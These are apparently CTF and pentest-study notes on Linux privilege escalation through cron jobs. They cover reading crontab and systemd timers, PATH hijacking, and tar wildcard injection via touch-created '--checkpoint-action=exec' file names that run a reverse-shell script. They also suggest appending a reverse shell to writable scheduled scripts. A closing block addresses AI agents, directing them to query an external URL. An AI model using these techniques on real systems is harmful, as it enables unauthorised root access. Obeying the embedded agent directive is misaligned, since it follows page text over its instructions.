# Cron Jobs

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs>" %}

Read the cron jobs then read permissions on any scripts running

```
cat /etc/crontab
```

{% hint style="info" %}
In CTF situations, if there are any custom scripts as cron  jobs they're most likely there for a reason, especially ones running as root.
{% endhint %}

Systemd timers could aslo be running which essentially do the same thing

```
systemctl list-timers --all
```

## Cron Paths

If the path of the script isn't a the full file path it will check the first path in the PATH variable for it first

<figure><img src="/files/8pkvTLW7jgZ4toZ8l6gJ" alt=""><figcaption></figcaption></figure>

## Cron Wildcards

If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead

<figure><img src="/files/cE7hw0A2JydyzJGFH7rY" alt=""><figcaption></figcaption></figure>

With tar specifically we can make it run a script using touch and checkpoints

```
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ rev.sh
```

## Cron File Overwrites

Check the file permissions on the scheduled script and add a reverse shell to it


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/linux-privilege-escalation/cron-jobs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.